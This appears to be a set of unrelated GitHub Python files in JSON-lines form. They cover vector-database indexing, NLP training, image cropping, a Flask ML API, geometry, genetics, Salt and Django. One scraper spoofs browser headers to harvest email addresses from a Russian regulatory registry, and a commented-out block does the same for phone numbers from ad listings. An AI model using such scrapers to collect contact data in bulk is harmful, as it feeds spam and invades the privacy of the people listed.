api_key=self.get_tool_config(\"WEAVIATE_API_KEY\")\n ),\n additional_headers={\n \"X-OpenAI-Api-Key\": self.get_tool_config(\"OPENAI_API_KEY\")\n },\n )\n\n self.openai_key = self.get_tool_config(\"OPENAI_API_KEY\")\n\n class_obj = {\n \"class\": \"Codefile\",\n \"vectorizer\": \"text2vec-openai\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"model\": \"gpt-3.5-turbo-16k\",\n },\n },\n \"properties\": [\n {\n \"name\": \"file_path\",\n \"dataType\": [\"text\"],\n \"description\": \"Path to code file\",\n },\n {\n \"name\": \"github_url\",\n \"dataType\": [\"text\"],\n \"description\": \"Github url of code file\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"type\",\n \"dataType\": [\"text\"],\n \"description\": \"Type of the file\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"repo\",\n \"dataType\": [\"text\"],\n \"description\": \"The code repository in Github\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"content\",\n \"dataType\": [\"text\"],\n \"description\": \"File content (code)\",\n },\n ],\n }\n self.w_client.schema.create_class(class_obj)\n\n # Github setup\n ghub_auth = Auth.Token(self.get_tool_config(\"GITHUB_ACCESS_TOKEN\"))\n ghub = Github(auth=ghub_auth)\n self.ghub_user = ghub.get_user(self.get_tool_config(\"GITHUB_USERNAME\"))\n\n def _execute(self, repository: str):\n \"\"\"\n Execute the RicAI Update Database with latest code tool.\n\n Args:\n repository: The Github repository to use for testing\n\n Returns:\n Nothing if successful. or error message.\n \"\"\"\n def upsert_codebase(ghub_repo_name):\n repo = self.ghub_user.get_repo(ghub_repo_name)\n contents = repo.get_contents(\"\")\n codefiles = []\n\n # TODO: populate with more ignorable file types\n ignore_extensions = [\n \".jpg\", \".jpeg\", \".png\", \".gif\", \".bmp\", \".tiff\", \".ico\", \".svg\",\n \".mp4\", \".avi\", \".mkv\", \".mov\", \".wmv\", \".flv\",\n \".mp3\", \".wav\", \".ogg\", \".aac\", \".flac\", \".wma\",\n \".pdf\", \".doc\", \".docx\", \".ppt\", \".pptx\", \".xls\", \".xlsx\", \".odt\", \".ods\", \".odp\",\n \".zip\", \".rar\", \".tar\", \".gz\", \".7z\",\n \".exe\", \".dll\", \".app\", \".apk\", \".iso\", \".img\", \".dmg\",\n ]\n\n while contents:\n file = contents.pop(0)\n if file.type == \"dir\":\n contents.extend(repo.get_contents(file.path))\n else:\n extension = os.path.splitext(file.name)[1].lower()\n if extension not in ignore_extensions:\n print(file.path)\n file_content = file.decoded_content.decode(\"utf-8\")\n codefiles.append({\n \"file_path\": file.path,\n \"github_url\": file.url,\n \"type\": file.type,\n \"repo\": file.repository,\n \"content\": file_content\n })\n file.last_modified\n\n # TODO: check if code from specific repo/codebase in Github is already present in the vector database\n # TODO: make sure that deterministic uuid generation works \n class_name = \"Codefile\"\n with self.w_client.batch() as batch:\n for codefile in codefiles:\n batch.add_data_object(\n codefile, \n class_name,\n uuid=generate_uuid5(identifier=codefile[\"path\"], namespace=codefile[\"repo\"])\n )\n return True\n \n try: \n result = upsert_codebase(repository)\n return f'Codebase updated successfully - {result}'\n except Exception as err:\n return f\"Error: Unable to update codebase with latest code - {err}\"","repo_name":"liskovich/RicAI_CodeStore","sub_path":"ricai_codestore_update.py","file_name":"ricai_codestore_update.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13013154114","text":"import time\nfrom data_util import ACEDataset, pad_trig\nfrom transformer import Trasformer\nfrom util import load_models, set_loss_optim, cal_prf\nfrom multi_instance_learning import MILLoss # use MIL method\nimport torch\nimport torch.utils.data as torch_data\nimport torch.nn.functional as F\nimport sys\n\nTab = '\\t'\n\n\ndef trainFunc(args, ace_data, debug=False):\n # put ace digit data into pytorch DataLoader\n train_loader = torch_data.DataLoader(ACEDataset(ace_data.train), batch_size=args.batch_size, shuffle=True,\n collate_fn=pad_trig)\n dev_loader = torch_data.DataLoader(ACEDataset(ace_data.dev), batch_size=args.batch_size, shuffle=False,\n collate_fn=pad_trig)\n test_loader = torch_data.DataLoader(ACEDataset(ace_data.test), batch_size=args.batch_size, shuffle=False,\n collate_fn=pad_trig)\n\n # init models\n # decoder = TrigRNN(args)\n decoder = Trasformer(args)\n decoder = decoder.to(args.device)\n # decoder = decoder.cuda()\n # print(decoder)\n # sys.eixt(0)\n decoder.word_embeddings.weight.data.copy_(torch.from_numpy(ace_data.pretrain_embedding))\n parameters = list(decoder.parameters())\n loss_function, optimizer = set_loss_optim(parameters, args.loss_flag, args.opti_flag, args.lr)\n loss_function_mil = MILLoss(mode='min') # 和上面from multi_instance_learning import MILLoss对应\n # loss_function_mil = MILLoss(mode='max')\n # training\n best_f1 = -1.0\n best_epoch = -1\n for epoch in range(args.epoch_num):\n training_id = 0\n loss_all = 0\n st_time = time.time()\n k = 0\n for iteration, batch in enumerate(train_loader):\n # if iteration>30:\n # break\n sentence_in, targets, batch_sent_lens, mask = batch\n g = max(batch_sent_lens.cpu().numpy())\n if (g > k):\n k = g\n sentence_in, targets, batch_sent_lens, mask = sentence_in.to(args.device), targets.to(\n args.device), batch_sent_lens.to(args.device), mask.to(args.device)\n decoder.zero_grad()\n\n tag_space = decoder(sentence_in, batch_sent_lens)\n targets_masked = targets + (1 - mask).long() * -1\n if iteration % 2 == 0:\n loss = 0.02 * loss_function_mil.forward(tag_space, targets_masked.view(-1).cpu())\n else:\n loss = loss_function(tag_space, targets_masked.view(-1))\n\n loss_all += loss.data.item()\n loss.backward()\n optimizer.step()\n training_id += sentence_in.size(0)\n output_loss = [\"%.2f\" % i for i in [loss.data.item(), loss_all]]\n print('iteration', iteration, 'loss', output_loss)\n\n # record best result on dev\n eval_results = eval_model(dev_loader, decoder, loss_function, args, data_flag=\"dev\")\n\n current_f1 = float(eval_results[1][-1])\n # print(eval_results[1][-1])\n if current_f1 > best_f1:\n best_f1 = current_f1\n best_epoch = epoch\n torch.save(decoder, args.model_path)\n print('Epoch', epoch, 'result', eval_results, \"Best epoch\", best_epoch, 'best_f1', best_f1)\n if epoch - best_epoch == args.early_stop: break\n decoder.train()\n\n\n eval_results = eval_model(train_loader, decoder, loss_function, args, data_flag=\"train\")\n output_model_result(eval_results, epoch, \"train\", args)\n\n # final result on test\n best_decoder = load_models(args.model_path)\n eval_flag = \"test\"\n eval_results = eval_model(test_loader, best_decoder, loss_function, args, vocab=ace_data.vocab,\n tags_data=ace_data.atag_dict, data_flag=eval_flag)\n result = output_model_result(eval_results, epoch, eval_flag, args)\n return result\n\n\ndef output_model_result(eval_results, epoch, eval_flag, args):\n loss, prf, prf_iden = eval_results\n f1 = prf[-1]\n loss = \"%.2f\" % loss\n print(eval_flag, \"results, epoch\", epoch, Tab, loss, time.asctime())\n print(\"##--Classification\", Tab, prf[0], Tab, prf[1], Tab, prf[2], Tab, \"##-- iden:\", prf_iden[0], Tab, prf_iden[1],\n Tab, prf_iden[2])\n return [prf[0], prf[1], prf[2], prf_iden[0], prf_iden[1], prf_iden[2]]\n\n\ndef eval_model(data_loader, decoder, loss_function, args, vocab=None, tags_data=None, data_flag=None):\n decoder.eval()\n loss_all = 0\n common = 0\n common_iden = 0\n gold = 0\n pred = 0\n\n for iteration, batch in enumerate(data_loader):\n sentence_in, targets, batch_sent_lens, mask = batch\n # batch_sent_lens表示一个batch中,每一句话的长度\n sentence_in, targets, batch_sent_lens, mask = sentence_in.to(args.device), targets.to(\n args.device), batch_sent_lens.to(args.device), mask.to(args.device)\n bsize = sentence_in.size(0) # 除了最后一个batch ,bsize都是100\n slen = sentence_in.size(1) # slen = 一个batch中最长的句子\n decoder.zero_grad()\n\n tag_space = decoder(sentence_in, batch_sent_lens)\n\n targets_masked = targets + (1 - mask).long() * -1\n\n loss = loss_function(tag_space, targets_masked.view(-1)).data.item()\n pred_trig_mask_4output = mask.float().unsqueeze(2).expand(bsize, slen, args.tagset_size).contiguous().view(\n bsize * slen, -1)\n\n # log_softmax\n _, tag_outputs = ((F.log_softmax(tag_space, dim=1)).data * pred_trig_mask_4output).max(1)\n\n gold_targets = targets.cpu().data.view(bsize, slen).numpy().tolist()\n pred_outputs = tag_outputs.cpu().view(bsize, -1).numpy().tolist()\n\n\n # statistic common, pred, gold for prf\n for target_doc, out_doc in zip(gold_targets, pred_outputs):\n\n for wid, (gitem, oitem) in enumerate(zip(target_doc, out_doc)):\n\n if gitem != 0: gold += 1\n if oitem != 0: pred += 1\n if gitem == oitem and (gitem != 0): common += 1 # 分类\n if (gitem != 0) and (oitem != 0): common_iden += 1 # 识别\n\n print(\"common:\", common, pred, gold)\n prf = cal_prf(common, pred, gold)\n prf_iden = cal_prf(common_iden, pred, gold)\n eval_results = [loss_all, prf, prf_iden]\n return eval_results\n","repo_name":"gitofding/event-detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2426511171","text":"import os\nfrom PIL import Image\nimport random\n\ndef process_images(augmentationHolder):\n images_from_location = os.listdir(augmentationHolder.images_path)\n for image_in_directory in images_from_location:\n image_path = os.path.join(augmentationHolder.images_path, image_in_directory)\n image = Image.open(image_path)\n if augmentationHolder.new_size:\n image = image.resize((augmentationHolder.new_size, augmentationHolder.new_size))\n image_name = image_path.split('\\\\')[-1].split('.')[0]\n \n image = image.crop((augmentationHolder.top_x, \n augmentationHolder.top_y, \n augmentationHolder.top_x + augmentationHolder.patch_size, \n augmentationHolder.top_y + augmentationHolder.patch_size))\n image.save(f\"{augmentationHolder.save_path}//{image_name}.tif\")\n# def process_images(images_path, save_path, new_size, patch_size, top_x, top_y):\n# images_from_location = os.listdir(images_path)\n# for image_in_directory in images_from_location:\n# image_path = os.path.join(images_path, image_in_directory)\n# image = Image.open(image_path)\n# if new_size:\n# image = image.resize((new_size, new_size))\n# image_name = image_path.split('\\\\')[-1].split('.')[0]\n \n# image = image.crop((top_x, top_y, top_x + patch_size, top_y + patch_size))\n# image.save(f\"{save_path}//{image_name}.tif\")\n\n# def process_images(images_path, save_path, patch_size):\n# images_from_location = os.listdir(images_path)\n# generated_values = False\n# for image_in_directory in images_from_location:\n# image_path = os.path.join(images_path, image_in_directory)\n# image = Image.open(image_path)\n# image_name = image_path.split('\\\\')[-1].split('.')[0]\n# if not generated_values:\n# width, height = image.size\n# top_x = random.randint(0, width - patch_size[0])\n# top_y = random.randint(0, height - patch_size[1])\n# bottom_x = top_x + patch_size[0]\n# bottom_y = top_y + patch_size[1]\n# generated_values = True\n# image = image.crop((top_x, top_y, bottom_x, bottom_y))\n# image.save(f\"{save_path}//{image_name}.tif\")\n \ndef process_location(augmentationObject, location):\n images_location = os.path.join(augmentationObject.image_path, location, 'images')\n images_from_location = os.listdir(images_location)\n \n location_save_name = f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\\\\images\"\n while os.path.exists(location_save_name):\n top_x = random.randint(0, augmentationObject.new_size - augmentationObject.patch_size)\n top_y = random.randint(0, augmentationObject.new_size - augmentationObject.patch_size)\n location_save_name = f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\\\\images\"\n os.mkdir(f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\")\n os.mkdir(location_save_name)\n \n process_images(augmentation) \n return 1\n\n# def process_location(image_directory, save_directory, patch_size, location, unique_id):\n# images_location = os.path.join(image_directory, location, 'images')\n# images_from_location = os.listdir(images_location)\n# location_save_name = f\"{save_directory}\\\\{location}_{unique_id}\\\\images\"\n \n# create_directory(f\"{save_directory}\\\\{location}_{unique_id}\")\n# create_directory(location_save_name)\n \n# process_images(images_location, location_save_name, (patch_size[0], patch_size[1])) \n# return unique_id\n","repo_name":"Tensor-Reloaded/Property-Development-Prediction","sub_path":"ASET_Stuff/defs_refactored.py","file_name":"defs_refactored.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70305348414","text":"from flask import Flask, jsonify, render_template, send_file\nimport csv\nimport mysql.connector\nimport random\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport io\n\napp = Flask(__name__)\n\n@app.route('/consulta', methods=['GET'])\ndef consultar_dados():\n try:\n # Conecta ao banco de dados MySQL\n conn = mysql.connector.connect(\n host='172.18.1.9',\n port=3306,\n user='user',\n password='senha',\n database='bd'\n )\n cursor = conn.cursor()\n\n # Executa a consulta dos últimos 20 dados da tabela\n cursor.execute('SELECT voltA AS voltA, voltB, voltC, correnteA, correnteB, correnteC, (voltA * correnteA) AS potenciaA, (voltB * correnteB) AS potenciaB, (voltC * correnteC) AS potenciaC from SM_002_Sensor LIMIT 20')\n data = cursor.fetchall()\n\n # Obtém os nomes das colunas\n field_names = [i[0] for i in cursor.description]\n\n # Gera um arquivo CSV com os dados\n with open('consulta.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(field_names)\n writer.writerows(data)\n\n # Lê o arquivo CSV gerado\n df = pd.read_csv('consulta.csv')\n\n # Remove 50% dos dados de forma aleatória\n df = df.sample(frac=0.5, random_state=42)\n\n # Separa os dados de entrada (X) e saída (y)\n X = df[['voltA', 'voltB', 'voltC', 'correnteA', 'correnteB', 'correnteC']]\n y = df['potenciaA'].astype('int')\n\n # Dicionário para armazenar os resultados dos algoritmos\n results = {}\n\n # KNN\n knn = KNeighborsRegressor()\n knn.fit(X, y)\n knn_predictions = knn.predict(X)\n knn_accuracy = accuracy_score(y, knn_predictions.round())\n knn_confusion_matrix = confusion_matrix(y, knn_predictions.round())\n results['knn'] = {'predictions': knn_predictions.tolist(), 'accuracy': knn_accuracy, 'confusion_matrix': knn_confusion_matrix.tolist()}\n\n # MLP\n mlp = MLPClassifier()\n mlp.fit(X, y)\n mlp_predictions = mlp.predict(X)\n mlp_accuracy = accuracy_score(y, mlp_predictions.round())\n mlp_confusion_matrix = confusion_matrix(y, mlp_predictions.round())\n results['mlp'] = {'predictions': mlp_predictions.tolist(), 'accuracy': mlp_accuracy, 'confusion_matrix': mlp_confusion_matrix.tolist()}\n\n # Naive Bayes\n nb = GaussianNB()\n nb.fit(X, y)\n nb_predictions = nb.predict(X)\n nb_accuracy = accuracy_score(y, nb_predictions.round())\n nb_confusion_matrix = confusion_matrix(y, nb_predictions.round())\n results['naive_bayes'] = {'predictions': nb_predictions.tolist(), 'accuracy': nb_accuracy, 'confusion_matrix': nb_confusion_matrix.tolist()}\n\n # Árvore de Decisão\n dt = DecisionTreeRegressor()\n dt.fit(X, y)\n dt_predictions = dt.predict(X)\n dt_accuracy = accuracy_score(y, dt_predictions.round())\n dt_confusion_matrix = confusion_matrix(y, dt_predictions.round())\n results['decision_tree'] = {'predictions': dt_predictions.tolist(), 'accuracy': dt_accuracy, 'confusion_matrix': dt_confusion_matrix.tolist()}\n\n # SVM\n svm = SVR()\n svm.fit(X, y)\n svm_predictions = svm.predict(X)\n svm_accuracy = accuracy_score(y, svm_predictions.round())\n svm_confusion_matrix = confusion_matrix(y, svm_predictions.round())\n results['svm'] = {'predictions': svm_predictions.tolist(), 'accuracy': svm_accuracy, 'confusion_matrix': svm_confusion_matrix.tolist()}\n\n cursor.close()\n conn.close()\n\n # Gera um novo arquivo CSV com os dados filtrados\n filtered_data = df[['voltA', 'voltB', 'voltC', 'correnteA', 'correnteB', 'correnteC', 'potenciaA']]\n filtered_data.to_csv('consulta_filtrada.csv', index=False)\n\n # Salvar matrizes de confusão como imagens\n for algorithm, result in results.items():\n cm = result['confusion_matrix']\n labels = sorted(list(set(y)))\n plt.figure(figsize=(8, 6))\n sns.heatmap(cm, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\n plt.title(f\"Confusion Matrix - {algorithm}\")\n plt.xlabel(\"Predicted\")\n plt.ylabel(\"True\")\n plt.savefig(f\"static/{algorithm}_confusion_matrix.png\")\n plt.close()\n\n return render_template('results.html', results=results)\n\n except Exception as e:\n return jsonify({'error': str(e)}), 500\n\n@app.route('/images/')\ndef send_image(filename):\n return send_file(f'static/{filename}', mimetype='image/png')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"pauloeugenio/ml-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25087286436","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport urllib.parse\nfrom urllib.parse import urlparse\nfrom socket import timeout\nimport re\nimport sys\nimport os\nimport json, csv, sys\nimport unicodedata\nimport codecs\nfrom unicodedata import normalize\nimport xlsxwriter\nimport os.path\nfrom http.cookiejar import CookieJar\nimport collections\nimport math\n\ndef uprint(*objects, sep=' ', end='\\n', file=sys.stdout):\n enc = file.encoding\n if enc == 'UTF-8':\n print(*objects, sep=sep, end=end, file=file)\n else:\n f = lambda obj: str(obj).encode(enc, errors='backslashreplace').decode(enc)\n print(*map(f, objects), sep=sep, end=end, file=file)\n\n \nclass Aggregator(object):\n \n def __init__(self, config):\n main_url, output_file = [config.get(k) for k in sorted(config.keys())]\n self.main_url = main_url\n self.output_file = output_file\n\n def request_to_page(self, url, cnt_page):\n try:\n current_url = url\n cookie_jar = CookieJar()\n opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n urllib.request.install_opener(opener)\n\n params = urllib.parse.urlencode({\n '_search': 'false',\n 'nd': '1441114066092',\n 'rows': '20',\n 'page': cnt_page,\n 'sidx': '',\n 'sord': 'asc',\n })\n \n data = params.encode('utf-8')\n request = urllib.request.Request(url)\n request.add_header(\"Accept\",\"application/json, text/javascript, */*\")\n request.add_header(\"Accept-Language\",\"ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4\")\n request.add_header(\"Connection\",\"keep-alive\")\n request.add_header(\"Accept-Encoding\",\"gzip, deflate\")\n request.add_header(\"Content-Length\",\"60\")\n request.add_header(\"Content-Type\",\"application/x-www-form-urlencoded\")\n request.add_header(\"Host\",\"sro.gosnadzor.ru\")\n request.add_header(\"Origin\",\"http://sro.gosnadzor.ru\")\n request.add_header(\"Referer\",\"http://sro.gosnadzor.ru/\")\n request.add_header(\"User-Agent\",\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36\")\n request.add_header(\"X-Compress\",\"null\")\n request.add_header(\"X-Requested-With\",\"XMLHttpRequest\")\n page = urllib.request.urlopen(request, data)\n\n content = page.read()\n #print(content)\n except urllib.error.URLError as e:\n if hasattr(e, 'reason'):\n print('Failed to connect to server.')\n print('Reason: ', e.reason)\n print(current_url)\n elif hasattr(e, 'code'):\n print('Error code: ', e.code)\n sys.exit(1)\n except timeout:\n print('socket timed out - URL %s', current_url)\n \n return content\n\n def request_to_p(self, url):\n try:\n current_url = url\n cookie_jar = CookieJar()\n opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n urllib.request.install_opener(opener)\n\n req = urllib.request.Request(url)\n page = urllib.request.urlopen(req)\n\n content = page.read()\n except urllib.error.URLError as e:\n if hasattr(e, 'reason'):\n print('Failed to connect to server.')\n print('Reason: ', e.reason)\n print(current_url)\n elif hasattr(e, 'code'):\n print('Error code: ', e.code)\n sys.exit(1)\n except timeout:\n print('socket timed out - URL %s', current_url)\n \n return content\n\n def start_process(self):\n \n pages_url = '/Home/SroData'\n for cnt in range(1,15):\n content = self.request_to_page(self.main_url+pages_url, str(cnt))\n try:\n req_arr = json.loads(content.decode('utf8'))\n rows = req_arr['rows']\n for row in rows:\n soup = BeautifulSoup(row['name'], \"lxml\")\n link = soup.find('a').attrs['href']\n print(self.main_url+link)\n cc = self.request_to_p(self.main_url+link)\n cc_soup = BeautifulSoup(cc, \"lxml\")\n mailto = cc_soup.select('a[href^=mailto]')[0].attrs['href'].replace('mailto:','')\n fo = open('sro_emails.txt', \"a\")\n fo.write(mailto+'\\n');\n fo.close()\n #print(mailto)\n \n #print(link)\n \n \"\"\"\n pager = soup.findAll('span', {\"class\": \"item fleft\"})\n last_page = pager[-1].find('span').text\n print(last_page)\n #int(last_page)\n for page in range(1,2):\n content_page = self.request_to_page(self.main_url+cat+'?page='+str(page))\n soup_page = BeautifulSoup(content_page, \"lxml\")\n page_links = soup_page.findAll('a', {\"class\": \"marginright5 link linkWithHash detailsLink\"})[0:-42]\n print(len(page_links))\n\n for item in page_links:\n item_url = item.attrs['href']\n content_item = self.request_to_page(item_url)\n soup_item = BeautifulSoup(content_item, \"lxml\")\n li_json = soup_item.find('li', {\"data-rel\": \"phone\"}).attrs['class']\n phone_id = li_json[5].replace(\"'id':'\",\"\").replace(\"',\",\"\")\n print(phone_id)\n parsed_uri = urlparse( item_url )\n domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n phone_url = domain+'/ajax/misc/contact/phone/'+phone_id+'/'\n print(phone_url)\n phone_json = self.request_to_page(phone_url)\n phone_arr = json.loads(phone_json.decode('utf8'))\n phone_string = phone_arr['value']\n if(phone_string.find(\"span\")):\n soup_phone = BeautifulSoup(phone_string, \"lxml\")\n phone_string = soup_phone.find('span', {\"class\": \"block\"}).text\n \n print(phone_string)\n fo = open(cat.replace('/','')+'.txt', \"a\")\n fo.write(phone_string.replace(' ','-')+'\\n');\n fo.close()\n \"\"\"\n except:\n links = ''\n \nif __name__ == '__main__':\n settings = { 'main_url': 'http://sro.gosnadzor.ru', 'output_file': 'output.xlsx' }\n aggregator = Aggregator(settings)\n aggregator.start_process()\n","repo_name":"stdex/web_crawlers","sub_path":"sro_gosnadzor/sro.py","file_name":"sro.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37021963640","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef demo():\n plt.figure()\n path=aspiral()\n plt.axis('equal')\n plt.show()\n\ndef aspiral():\n\n max_diameter= 40 # inches\n Nturns, segments_per_turn = 5, 64\n\n a = max_diameter / (2 * Nturns * 2*np.pi)\n t = np.arange(0, Nturns * 2*np.pi, 2*np.pi / segments_per_turn) # theta\n r = a * t # radius\n x, y = r * np.cos(t), r * np.sin(t) # cartesian\n k = 2 + t**2 / (a * (1 + t ** 2) ** 3/2) # curvature\n s = a/2 * (t * np.sqrt(1 + t ** 2) + np.arcsinh(t)) # arc length\n\n PLOT=True\n if PLOT:\n plt.subplot(211)\n plt.plot(x, y)\n plt.axis('equal')\n plt.title('spiral shape (inches)')\n\n plt.subplot(212)\n plt.plot(t, s/12)\n plt.xlabel('theta')\n plt.ylabel('arc length (feet)')\n\n return x+1j*y\n\n\nif __name__ == '__main__':\n demo()\n","repo_name":"alanbernstein/geometry","sub_path":"archimedean_spiral.py","file_name":"archimedean_spiral.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8784745743","text":"def interpolate(x1, x2, y1, y2, x):\n return y2 + (x - x2) * (y2 - y1) / (x2 - x1)\n\ndef map_positions(map, positions):\n \"\"\"\n Iterate through genetic positions and interpolate coordinates in cM.\n \"\"\"\n genetic_dist = []\n idx = 0\n n_row = len(map.index)\n for p in positions:\n while True:\n row = map.loc[idx]\n if p == row.Pos:\n genetic_dist.append(row.GeneticDist)\n break\n elif (p < row.Pos and idx != 0) or (idx + 1 == n_row):\n interp = interpolate(map.loc[idx-1, \"Pos\"], row.Pos, map.loc[idx-1, \"GeneticDist\"], row.GeneticDist, p)\n genetic_dist.append(interp)\n break\n elif p < row.Pos and idx == 0:\n interp = interpolate(row.Pos, map.loc[idx+1, \"Pos\"], row.GeneticDist, map.loc[idx+1, \"GeneticDist\"], p)\n genetic_dist.append(interp)\n break\n else:\n idx += 1\n return(genetic_dist)\n","repo_name":"roshnipatel/LocalAncestry","sub_path":"scripts/genetic_map.py","file_name":"genetic_map.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12846460194","text":"\"\"\"\nThis is the default pillar exact matcher.\n\"\"\"\n\nimport logging\n\nimport salt.utils.data\n\nlog = logging.getLogger(__name__)\n\n\ndef match(tgt, delimiter=\":\", opts=None, minion_id=None):\n \"\"\"\n Reads in the pillar match, no globbing, no PCRE\n \"\"\"\n if not opts:\n opts = __opts__\n log.debug(\"pillar target: %s\", tgt)\n if delimiter not in tgt:\n log.error(\"Got insufficient arguments for pillar match statement from master\")\n return False\n\n if \"pillar\" in opts:\n pillar = opts[\"pillar\"]\n elif \"ext_pillar\" in opts:\n log.info(\"No pillar found, fallback to ext_pillar\")\n pillar = opts[\"ext_pillar\"]\n\n return salt.utils.data.subdict_match(\n pillar, tgt, delimiter=delimiter, exact_match=True\n )\n","repo_name":"saltstack/salt","sub_path":"salt/matchers/pillar_exact_match.py","file_name":"pillar_exact_match.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"73896442813","text":"#!/usr/bin/python3\n\"\"\" Task 6 module \"\"\"\n\"\"\" Error check function for positive integers \"\"\"\n\n\ndef int_check(value):\n if (type(value) != int):\n raise TypeError(\"size must be an integer\")\n return False\n if (value < 0):\n raise ValueError(\"size must be >= 0\")\n return False\n return True\n\n\n\"\"\" Error check function for tuple of 2 positive integers \"\"\"\n\n\ndef int_tuple_check(tup):\n if (type(tup) != tuple or len(tup) != 2):\n return False\n for i in range(0, 2):\n if (type(tup[i]) != int or tup[i] < 0):\n return False\n return True\n\n\n\"\"\" Square class representing a square \"\"\"\n\n\nclass Square():\n \"\"\" Square class \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n if (int_check(size)):\n self.__size = size\n if (int_tuple_check(position)):\n self.__position = position\n else:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, size):\n if (int_check(size)):\n self.__size = size\n\n @property\n def position(self):\n return self.__position\n\n @position.setter\n def position(self, position):\n if (int_tuple_check(position)):\n self.__position = position\n else:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n def area(self):\n return self.__size ** 2\n\n def my_print(self):\n size = self.size\n if not size:\n print()\n return\n print(\"\\n\"*self.__position[1], end=\"\")\n for i in range(size):\n print(\" \"*self.__position[0], end=\"\")\n for i in range(size):\n print(\"#\", end=\"\")\n print()\n","repo_name":"blashernandez98/holbertonschool-higher_level_programming","sub_path":"python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13992731004","text":"from django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\n\n# Create your models here.\nclass Comment(models.Model):\n \"\"\"\n Define Comment Model, Level 1.\n \"\"\"\n from_id = models.ForeignKey('account.User', on_delete=models.CASCADE, related_name=\"from_user\")\n to_id = models.ForeignKey('account.User', on_delete=models.CASCADE, related_name=\"to_user\")\n pub_date = models.DateTimeField() # comment publish time\n content = models.TextField()\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE) # the type of the object it belongs to.\n object_id = models.PositiveIntegerField() # answer id / article id / issue id\n content_object = GenericForeignKey('content_type', 'object_id')\n parent_comment = models.ForeignKey('self', on_delete=models.CASCADE, null=True) #record the parent comment. if it's level 1 comment. it should be null.\n likers = models.ManyToManyField('account.User', related_name='comment_liker')\n\n def __str__(self):\n return str(self.id)","repo_name":"FDUSoftware2020/backend","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32609198867","text":"\"\"\"\nEAE-126 Computational Aerodynamics (Spring 2011)\nDaniel Wiese\n\nProject 1: Steady, inviscid, adiabatic, incompressible, and irrotational 2D flows over cylinder\nPart 3: Flow field for Rankine body, Kelvin oval\n\nDerive the velocity for a Rankine and Kelvin body in uniform flow. Plot the velocity vectors and\nvelocity contours for each case. Calculate the pressure coefficient and plot it.\n\"\"\"\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n# Set up coordinates\nxmin = -1\nxmax = 1\ndx = 0.05\nx = np.arange(xmin, xmax+dx, dx)\ny = np.arange(xmin, xmax+dx, dx)\nX, Y = np.meshgrid(x, y)\nngrid = len(x)\n\nrho = 1\nQ = 50\nGamma = 50\nvinf = 10\na = 0.23\n\nr = np.sqrt(X**2 + Y**2)\ncosine = X / r\nsine = Y / r\n\nuinf = np.full_like(X, vinf)\n\n####################################################################################################\n\nrsorc = 